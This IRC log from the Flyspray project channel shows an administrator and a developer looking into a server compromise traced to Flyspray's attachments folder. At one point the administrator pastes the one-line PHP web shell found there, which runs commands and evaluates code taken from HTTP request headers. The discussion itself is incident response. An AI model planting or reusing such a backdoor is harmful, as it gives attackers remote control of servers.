02:25.16 | *** join/#flyspray cytrinox_ (n=cyx@Zea7f.z.pppool.de) |
08:32.37 | *** join/#flyspray floele (n=Miranda@p5DCA5606.dip.t-dialin.net) |
08:32.37 | *** mode/#flyspray [+o floele] by ChanServ |
09:50.37 | *** join/#flyspray brain0 (n=brain0@archlinux/developer/brain0) |
09:52.03 | brain0 | is there a known vulnerability in flyspray that would allow an attacker to execute code that has been uploaded as an attachment before? |
09:54.53 | brain0 | there was a process running with: /proc/$PID/exe -> /srv/http/flyspray-0.9.9.6/attachments/. /wunderbar_emporium/heh1 (deleted) |
09:55.07 | brain0 | however, script and cgi execution is disabled in the attachments folder |
11:30.46 | floele | we're not aware of any such vulnerabilities, otherwise we'd certainly fix it |
11:33.10 | brain0 | hmmm |
11:33.13 | brain0 | thank you for now |
11:33.35 | brain0 | it's weird anyway: execution of scripts on the attachments folder is disabled, but a .php script still got executed |
11:33.57 | brain0 | we 403'ed the folder for now, but some webapp must have allowed an upload and execution of the script into that folder |
11:34.52 | floele | what kind of script was running actually? |
11:39.35 | brain0 | <?php if($_SERVER['HTTP_CMD']) passthru($_SERVER['HTTP_CMD']); if($_SERVER['HTTP_EVL']) eval($_SERVER['HTTP_EVL]'); ?> |
11:39.55 | floele | ok, that's not so nice ;) |
11:40.35 | brain0 | not really |
11:41.01 | brain0 | I cannot say for sure it was even flyspray (there's also mediawiki running, and some more apps) |
11:41.07 | floele | so is /wunderbar_emporium/heh1 that script? |
11:41.17 | brain0 | only that all of this happened inside flyspray's attachment folder |
11:41.29 | brain0 | no, that is a binary which was compiled afterwards and executed |
11:42.31 | brain0 | that script was simply called ".php" |
11:43.36 | floele | hm...maybe the attacker needed a for PHP writable folder, which can be accessed from the outside? flyspray itself doesn't allow you to upload files with arbitrary names |
11:45.40 | brain0 | yes, I know that, I looked around in the source a bit |
11:46.04 | brain0 | so the attacker must have known in advance where that directory is and used a whole in another webapp |
11:46.08 | brain0 | maybe |
11:46.10 | brain0 | maybe not |
11:47.15 | floele | I just remember a similar script from an attack through phpBB...maybe you've got an old version running somewhere? |
11:49.10 | brain0 | we have punBB |
11:50.15 | brain0 | it's still weird that the attacker knew where to look for the attachments folder |
11:50.29 | brain0 | ah, maybe he had it from a php error messages, which often include complete paths |
11:51.06 | floele | could be the case, yep |
11:51.06 | brain0 | so if - at some point - the attacker was able to trigger a php error in flyspray, he would have known the path /srv/http/flyspray-0.9.9.6 or even /srv/http/flyspray-0.9.9.6/attachments from the error message |
11:51.36 | floele | well, attachments is not hard to guess anyway |
11:51.56 | brain0 | well, thank you anyway, if we ever find out what happened, I will tell you (especially if it was flyspray's fault after all) |
11:52.43 | floele | yep, that'd be appreciated ,) |